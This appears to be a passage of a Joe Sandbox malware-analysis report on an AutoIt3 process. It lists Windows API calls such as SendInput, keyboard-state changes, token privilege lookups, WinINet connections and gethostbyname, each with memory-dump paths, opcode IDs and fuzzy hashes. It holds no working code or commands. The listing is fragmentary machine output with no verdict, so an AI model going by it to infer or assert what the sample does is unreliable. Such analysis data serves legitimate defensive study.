                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008613A8
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008613FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 3a813fc4578b962fa3a7db6b82a82f37d80c1146a3b61f4cccc79a75c5071665
                                      • Instruction ID: 04a6243c4ee9f7fd259c216ba9aaf1db43d82ce41990108cdbbbe75d00649006
                                      • Opcode Fuzzy Hash: 3a813fc4578b962fa3a7db6b82a82f37d80c1146a3b61f4cccc79a75c5071665
                                      • Instruction Fuzzy Hash: A6313930A40218AEFF308A658D0DBFE7BBAFB44310F0D421AE592D27D2D37889419B95
                                      APIs
                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00861465
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00861481
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 008614E0
                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00861532
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 1de56cfd99ff6eba9e302f9e224a07a253fbd90a083752dc7db339ab4b8a2f44
                                      • Instruction ID: 9dffecb4cd84661cb0d5177c1de480fc9d94620df4006ceee2ae7f490cae9de2
                                      • Opcode Fuzzy Hash: 1de56cfd99ff6eba9e302f9e224a07a253fbd90a083752dc7db339ab4b8a2f44
                                      • Instruction Fuzzy Hash: D2314830A402185EFF348A659C0CBFABBA6FB85315F0D435AE481D31D2CB748941DB6A
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0083642B
                                      • __isleadbyte_l.LIBCMT ref: 00836459
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00836487
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008364BD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 84a7db6fe70789e7e3c768fac59b2d364af77cfc691d84055f9911de15da833b
                                      • Instruction ID: 13c7746add44f263d855401686a2abc69bfcb828b9486f3b7a1811d874e266ee
                                      • Opcode Fuzzy Hash: 84a7db6fe70789e7e3c768fac59b2d364af77cfc691d84055f9911de15da833b
                                      • Instruction Fuzzy Hash: 3831B031A00256BFDB218F69CC45BAA7BA5FF81320F158469E864D7191EB31E8A0DB94
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0088553F
                                        • Part of subcall function 00863B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00863B4E
                                        • Part of subcall function 00863B34: GetCurrentThreadId.KERNEL32 ref: 00863B55
                                        • Part of subcall function 00863B34: AttachThreadInput.USER32(00000000,?,008655C0), ref: 00863B5C
                                      • GetCaretPos.USER32(?), ref: 00885550
                                      • ClientToScreen.USER32(00000000,?), ref: 0088558B
                                      • GetForegroundWindow.USER32 ref: 00885591
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 3fc9e33bdca13035bb7b2d67f32f620ef90ff4ad0f31123242399bc285142f91
                                      • Instruction ID: 053f2234051b42a081a239d6b0e11c54dfeaaeb61ba1e00cb169f6670cfb6e8d
                                      • Opcode Fuzzy Hash: 3fc9e33bdca13035bb7b2d67f32f620ef90ff4ad0f31123242399bc285142f91
                                      • Instruction Fuzzy Hash: 51312FB1900108AFDB40EFA9DC85DEFB7F9FF94304F11406AE915E7241EA71AE448BA1
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetCursorPos.USER32(?), ref: 0088CB7A
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0083BCEC,?,?,?,?,?), ref: 0088CB8F
                                      • GetCursorPos.USER32(?), ref: 0088CBDC
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0083BCEC,?,?,?), ref: 0088CC16
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: acc56338a7093fb8a04ddbd0265f4a8f31e105a4abad50765548534bbf466721
                                      • Instruction ID: 3a8c3e93f79db2439ecff3640346aa5ab2e4690bd1c382fea0d4ef57d544e122
                                      • Opcode Fuzzy Hash: acc56338a7093fb8a04ddbd0265f4a8f31e105a4abad50765548534bbf466721
                                      • Instruction Fuzzy Hash: 44319E35600418AFCB25AF59CC59EBA7BB9FF49320F0440A9F945DB261C7319D50EFA0
                                      APIs
                                      • __setmode.LIBCMT ref: 00820BE2
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      • _fprintf.LIBCMT ref: 00820C19
                                      • OutputDebugStringW.KERNEL32(?), ref: 0085694C
                                        • Part of subcall function 00824CCA: _flsall.LIBCMT ref: 00824CE3
                                      • __setmode.LIBCMT ref: 00820C4E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      • Opcode ID: 526c28fda19deba827b4497f0daac6ec7cb9c86fce800622dfabce2baa8d3c6b
                                      • Instruction ID: 2611300bc5736528fba76d0c0e1757070459f954a5bd915e95726e06509453ba
                                      • Opcode Fuzzy Hash: 526c28fda19deba827b4497f0daac6ec7cb9c86fce800622dfabce2baa8d3c6b
                                      • Instruction Fuzzy Hash: 2B1105B19041286EDB08B7ACBC429BE7B6DFF40321F141156F604D71C2DE2119D64BA2
                                      APIs
                                        • Part of subcall function 00858D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858D3F
                                        • Part of subcall function 00858D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00858D49
                                        • Part of subcall function 00858D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D58
                                        • Part of subcall function 00858D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D5F
                                        • Part of subcall function 00858D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D75
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008592C1
                                      • _memcmp.LIBCMT ref: 008592E4
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0085931A
                                      • HeapFree.KERNEL32(00000000), ref: 00859321
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 31e35b7acc25905d94ec1ad753cd9174d1727d49536c5c26ab60009c21d3e975
                                      • Instruction ID: 21e1c8bcf1217d3e622f846308278d10d7bb03fbac3e8f7f6e93d425f8c26c91
                                      • Opcode Fuzzy Hash: 31e35b7acc25905d94ec1ad753cd9174d1727d49536c5c26ab60009c21d3e975
                                      • Instruction Fuzzy Hash: 0F219D72E40108EFDB10DFA4C945BEEB7B8FF54342F184059E895E7291E770AA09DB90
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00871E6F
                                        • Part of subcall function 00871EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00871F18
                                        • Part of subcall function 00871EF9: InternetCloseHandle.WININET(00000000), ref: 00871FB5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 3d21e6899aa056ec4d07563dadabb196875e91de9fec66806c3ca4272d0c6183
                                      • Instruction ID: f5a20a5d56d8309f9672d89fee77589429f3153cb08f3a234cd03c0b77945f9b
                                      • Opcode Fuzzy Hash: 3d21e6899aa056ec4d07563dadabb196875e91de9fec66806c3ca4272d0c6183
                                      • Instruction Fuzzy Hash: 87219232204605BFDB119F688C05F7BB7AEFF84710F14811AFE49D6954DB71E8119B90
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00892C4C), ref: 00863F57
                                      • GetLastError.KERNEL32 ref: 00863F66
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00863F75
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00892C4C), ref: 00863FD2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: 1b4aee7e77cc4f979aa360b10cf4e39477019ef9ba2662e18c43800abf588571
                                      • Instruction ID: 77dc4a7d5177117a21138c537605f38624c63eb52f39af46b3f872991b2e7bcc
                                      • Opcode Fuzzy Hash: 1b4aee7e77cc4f979aa360b10cf4e39477019ef9ba2662e18c43800abf588571
                                      • Instruction Fuzzy Hash: 392151709082019F8710EF28D8858AEB7F8FF59368F154A1EF4A5C72A1DB31DA46CB52
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03D1727C
                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 03D1729E
                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03D172A8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 03D172EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 7d6857d77cd2be96a4cb7b8c5ec5321ab712cb04d483956c84c88609a6d51820
                                      • Instruction ID: ef1de3697124d61983ff1a0e45a600166a34ddbec2cde6264f88375900bcf4b1
                                      • Opcode Fuzzy Hash: 7d6857d77cd2be96a4cb7b8c5ec5321ab712cb04d483956c84c88609a6d51820
                                      • Instruction Fuzzy Hash: 9121A174B10348BFD701EBA5CC80BAEB7B8EB44700F924468E914FA290DA745E119661
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 008863BD
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008863D7
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008863E5
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008863F3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: d238aac1a230526cb9bb11665353a9f3996d2800ad14058b9d249cdff6471e44
                                      • Instruction ID: e6519d7467d30e3dc23b9f5a61eb206bd87b9a0ff7d5c4af865ad0766cd2eabe
                                      • Opcode Fuzzy Hash: d238aac1a230526cb9bb11665353a9f3996d2800ad14058b9d249cdff6471e44
                                      • Instruction Fuzzy Hash: 0E11EE31304914AFD700BB28CC45FBA77A8FF86320F184119F916DB2D2DBA1AC10CB91
                                      APIs
                                        • Part of subcall function 0085F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0085E46F,?,?,?,0085F262,00000000,000000EF,00000119,?,?), ref: 0085F867
                                        • Part of subcall function 0085F858: lstrcpyW.KERNEL32(00000000,?), ref: 0085F88D
                                        • Part of subcall function 0085F858: lstrcmpiW.KERNEL32(00000000,?,0085E46F,?,?,?,0085F262,00000000,000000EF,00000119,?,?), ref: 0085F8BE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0085F262,00000000,000000EF,00000119,?,?,00000000), ref: 0085E488
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 0085E4AE
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0085F262,00000000,000000EF,00000119,?,?,00000000), ref: 0085E4E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 4135f92ad85322af805d4a12840f074b26e113b9e5268cb2fd38612411cadc6d
                                      • Instruction ID: 556d2a39c65575e7041099ed72b6990a627a952125b63a5da1fac590f9175f05
                                      • Opcode Fuzzy Hash: 4135f92ad85322af805d4a12840f074b26e113b9e5268cb2fd38612411cadc6d
                                      • Instruction Fuzzy Hash: 7511933A100345EFDB29AF28DC45D7A77A9FF45351B40402AFD06CB2A0FB719954CB95
                                      APIs
                                      • _free.LIBCMT ref: 00835331
                                        • Part of subcall function 0082593C: __FF_MSGBANNER.LIBCMT ref: 00825953
                                        • Part of subcall function 0082593C: __NMSG_WRITE.LIBCMT ref: 0082595A
                                        • Part of subcall function 0082593C: RtlAllocateHeap.NTDLL(00E90000,00000000,00000001,?,00000004,?,?,00821003,?), ref: 0082597F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: d1c8bf2699fb67a97cd57ca0a869ffc1e12fca7fe520fe39d297fc2ff60d2e9b
                                      • Instruction ID: 74045b01e6cde9d9f5fd76bbfde52e16d4fef76031859523c00f912fa9fa1cfb
                                      • Opcode Fuzzy Hash: d1c8bf2699fb67a97cd57ca0a869ffc1e12fca7fe520fe39d297fc2ff60d2e9b
                                      • Instruction Fuzzy Hash: F6119432506A29EFCF203B78FC4565A3A94FF963A0F10452AF858DA291DE74898497D1
                                      APIs
                                      • _memset.LIBCMT ref: 00815B58
                                        • Part of subcall function 008156F8: _memset.LIBCMT ref: 00815787
                                        • Part of subcall function 008156F8: _wcscpy.LIBCMT ref: 008157DB
                                        • Part of subcall function 008156F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008157EB
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00815BAD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00815BBC
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00850D7C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 46e4cfc77dba6e429b58d00f400a1d308cccb0bb6d356158193d5fd26233d592
                                      • Instruction ID: 8000ef97d1b4da48c4eaaa8b1672e09f1408abceb9766f140bd2b99d6a1ad91e
                                      • Opcode Fuzzy Hash: 46e4cfc77dba6e429b58d00f400a1d308cccb0bb6d356158193d5fd26233d592
                                      • Instruction Fuzzy Hash: 8B21DA70908784AFE7728B648895FEABBFCFF41319F04058DE69A96141C37429C8DF51
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00864385
                                      • _memset.LIBCMT ref: 008643A6
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008643F8
                                      • CloseHandle.KERNEL32(00000000), ref: 00864401
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 8796994b8385218d5ea793de64a32e8cc4967903a39aba17a51c6fbcbde9f809
                                      • Instruction ID: 2ace13e8cdd465863966b3b0b3d53a30c76842ee855682e60d7328041f2a7857
                                      • Opcode Fuzzy Hash: 8796994b8385218d5ea793de64a32e8cc4967903a39aba17a51c6fbcbde9f809
                                      • Instruction Fuzzy Hash: 5911EB71901228BAD7309BA5AC4DFEFBB7CFF45720F04459AF908E7280D6744E808BA4
                                      APIs
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00876A84
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00876A8F
                                      • _memmove.LIBCMT ref: 00876ABC
                                      • inet_ntoa.WSOCK32(?), ref: 00876AC7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      • Opcode ID: 5fa2055da3ce2f0dd4542b3f2627d1dda68c02ecbeb95a6be2df5235f809b7f6
                                      • Instruction ID: 26df48af44d0247f11449e8104d885f117970d873d25c6ce186211b3f4163273
                                      • Opcode Fuzzy Hash: 5fa2055da3ce2f0dd4542b3f2627d1dda68c02ecbeb95a6be2df5235f809b7f6
                                      • Instruction Fuzzy Hash: CA114F72A40109AFCB40FBA8CD46CEEB7B8FF18311B148065F506E72A1DF309E549B92
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00859719
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0085972B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00859741
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0085975C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
